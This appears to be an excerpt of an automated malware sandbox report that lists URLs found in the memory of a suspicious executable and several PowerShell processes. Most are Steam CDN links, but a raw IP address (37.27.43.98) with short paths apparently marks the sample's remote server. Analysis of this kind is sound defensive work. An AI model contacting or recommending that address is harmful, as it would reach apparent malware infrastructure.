e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://37.27.43.98
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.43.98/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.43.98/R
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.43.98/j
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.43.98/k
Source: powershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamsta
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=english&am
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=engli
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&amp;l=en
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92T
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&amp;l=englis
